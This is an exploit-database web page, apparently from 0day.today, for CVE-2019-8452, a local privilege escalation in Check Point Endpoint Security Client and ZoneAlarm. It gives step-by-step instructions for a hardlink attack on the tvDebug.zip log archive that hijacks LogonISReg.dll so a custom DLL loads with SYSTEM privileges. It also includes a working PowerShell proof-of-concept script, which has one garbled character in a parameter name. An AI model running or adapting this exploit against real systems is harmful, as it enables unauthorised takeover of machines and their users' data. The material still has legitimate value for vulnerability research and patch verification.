0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
CheckPoint Endpoint Security Client/ZoneAlarm 15.4.062.17802 - Privilege Escalation Vulnerability
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: CheckPoint Endpoint Security Client/ZoneAlarm 15.4.062.17802 - Privilege Escalation # Exploit Author: Jakub Palaczynski # Vendor Homepage: https://www.checkpoint.com/ # Version: Check Point Endpoint Security VPN <= E80.87 Build 986009514 # Version: Check Point ZoneAlarm <= 15.4.062.17802 # CVE: CVE-2019-8452 Description: ============ It is possible to change permissions of arbitrary file so that user have full control over it after exploitation which results in Local Privilege Escalation. It was found that Check Point software (Endpoint Security Client and ZoneAlarm) uses tvDebug.log file stored in "C:\Windows\Internet Logs\tvDebug.log" or in ProgramData, for example "C:\ProgramData\CheckPoint\ZoneAlarm\Logs\tvDebug.log". Over this log file all authenticated users have full control and it was found that Check Point service writes to it with SYSTEM privileges. However this file could not be used for exploitaion as it is always used/taken by Check Point service so for example this is why users cannot delete it in normal conditions (unless service crashes and/or is restarted). However it was noticed that when this log file reaches some limit (depending on software) then it is archived to the same location and name but with ZIP extension. The same permissions are set for this archive file so all authenticated users can access it. Taking all of this into account we can create an attack scenario: 1. If tvDebug.zip file exists then delete it 2. Create hardlink (using CreateHardlink.exe) named tvDebug.zip which points to other file that we would like to have permissions to (this file must not be taken by other process when Check Point service tries to use it) 3. Fill tvDebug.log log file above the limit. For ZoneAlarm it is 50Mb, for VPN it is 20Mb. It can be done by using software as normal user. 4. Restart system as service needs to be restarted to make an archive. 5. Now your file has permissions changed and you have all access to it. 6. If we pointed to "C:\Program Files (x86)\CheckPoint\Endpoint Connect\LogonISReg.dll" in step 2 then we can replace this DLL with custom one. 7. Click "VPN Options" in Client GUI and then close this windows. Closing "VPN Options" window forces LogonISReg.dll to be loaded with SYSTEM privileges. Proof of Concept: ================= # PoC written in PowerShell to fully exploit Check Point Endpoint Client. It can be used also to exploit ZoneAlarm. # file that we want to have permissions to # LogonISReg.dll is not used on startup and we can force to load it with SYSTEM privileges after exploitation $file = "C:\Program Files (x86)\CheckPoint\Endpoint Connect\LogonISReg.dll" # path to symboliclink testing tools CreateHardlink.exe # CreateHardlink.exe is a tool created by James Forshaw - https://github.com/googleprojectzero/symboliclink-testing-tools $hardlink = "C:\Temp\CreateHardlink.exe" Write-Host "[!] Detecting Check Point software." if ([System.IO.File]::Exists("$env:windir\Internet Logs\tvDebug.log")) { $logfile = "$env:windir\Internet Logs\tvDebug.zip" Write-Host "[+] Check Point Endpoint Security found." } elseif ([System.IO.File]::Exists("$env:programdata\CheckPoint\ZoneAlarm\Logs\tvDebug.log")) { $logfile = "$env:programdata\CheckPoint\ZoneAlarm\Logs\tvDebug.zip" Write-Host "[+] Check Point ZoneAlarm found." } else { Write-Host "[-] Check Point software was not found." } Write-Host "[!] Trying to delete tvDebug.zip file." if ([System.IO.File]::Exists($logfile)) { while ([System.IO.File]::Exists($logfile)) { Remove-Item -Force 朴ath $logfile -ErrorAction SilentlyContinue } Write-Host "[+] Successfully deleted tvDebug.zip archive file." } else { Write-Host "[+] tvDebug.zip archive file was not found." } Write-Host "[!] Creating hardlink to a file that we would like to change permissions." Start-Process -FilePath "cmd.exe" -ArgumentList "/c $hardlink `"$logfile`" `"$file`"" while (!([System.IO.File]::Exists($logfile))) { Sleep 1 } Write-Host "[+] Hardlink successfully created." Write-Host "[!] 1. Fill log file up to the limit and restart computer." Write-Host "[!] 2. Now when permissions are changed replace LogonISReg.dll with your custom DLL." Write-Host "[!] 3. Click VPN Options in Client GUI and close this window to force DLL load." # 0day.today [2024-12-26] #